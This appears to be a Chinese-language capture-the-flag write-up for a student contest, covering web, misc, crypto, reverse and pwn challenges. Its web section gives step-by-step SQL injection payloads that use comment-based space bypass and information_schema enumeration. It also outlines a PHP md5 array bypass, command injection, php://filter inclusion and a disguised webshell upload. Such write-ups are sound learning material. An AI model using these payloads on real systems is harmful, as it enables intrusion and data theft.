目录
web
easy_sql
这题没做出来,发现是绕过空格(可用/**/绕过),但是在使用联合查询语句时查不出来
后面师兄说了子查询才明白怎么做,学到了新知识
第一步:首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数,尝试后发现有三列
输入-1'/**/order/**/by/**/3#
第二步:爆出显示位,就是看看表格里面那一列是在页面显示的。可以看到是第1列里面的数据是显示在页面的。
输入-1'/**/union/**/select/**/1,2,3#
第三步:获取当前数据名,得到库yunxi_exam
输入-1'/**/union/**/select/**/database(),2,3#
第四步: 爆表 得到表bighacker,users
使用到子查询
输入 -1'/**/union/**/select/**/(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='yunxi_exam'),2,3#
第五步:爆字段名 得到字段hack1,hack2,hack3
输入 -1'/**/union/**/select/**/(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='bighacker'),2,3#
第六步:获得flag
输入 -1'/**/union/**/select/**/group_concat(concat_ws("~",hack2,hack3)),2,3/**/from/**/bighacker#
easy_php
分析代码可知是get方式传入0、1,且0、1的md5值要相等,a的值还要等于2023
这里考虑到md5碰撞绕过即可 ?0[]=2023&1[]=2
easy_rce
发现提示输入ip,猜测是命令执行使用| ls查看
继续看根目录,发现flag文件
cat被过滤了,tac即可
easy_include
提示很明显了,php://filter协议即可
easy_upload
上传php文件,改检查类型为image/jpeg
蚁剑连接即可
Boom!
一开始遍历10w字典失败,最后看了提示,发现密码是学号是2021228041..
差两位,BP爆破即可
传个参吧
提示传参,查看源代码,发现应该传的参数是hint
进入页面,分析POST方式传入Exam=Welcom_come_to_Yunxi_Exam即可
flag在哪?
查看网页源代码即可
misc
music
提示密码nono,mp3隐写解密即可
decode.exe -X music.mp3 -P nono
查看它的txt文件即可
今天你学习了吗?
题目提示下面那条白边不够明显吗,猜测是图片改高即可
010尝试发现flag
想看我驴哥吗?
发现图片压缩需要密码,010看一看不存在伪加密,尝试暴力破解,发现密码是604604
解压后在图片详细信息下发现一段base64,解码即可
流量分析
发现是一个流量包,在里面搜索即可找到flag
徐江的嘲讽
发现又是一个要密码的压缩包,010看一看,发现伪加密,改出即可
Life Story
一个损坏的压缩包,010看看发现不是压缩包,记事本看看,发现一串emo表情
emo解密即可,再来一次base32、base64
Crypto
怎么?只会贝斯拿不下你?
base家族遍历即可
简单的密码
核心价值观密码解密
再来一个百家姓解密即可
easy_rsa
很简单的一个rsa解密
用个工具或者脚本即可,使用工具时,e的值需要10进制转为16进制,给出的D值即为flag
5+n的凯撒
简单的变异凯撒,找规律发现偏移量应该是5+n
搞个py脚本跑一跑即可
Reverse
re1
查壳后ida32位打开即可
Pwn
NC
kali打开自带nc连接即可